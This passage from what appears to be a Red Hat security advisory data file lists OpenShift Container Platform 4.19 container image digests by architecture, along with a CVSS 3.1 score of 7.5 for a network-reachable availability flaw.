"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
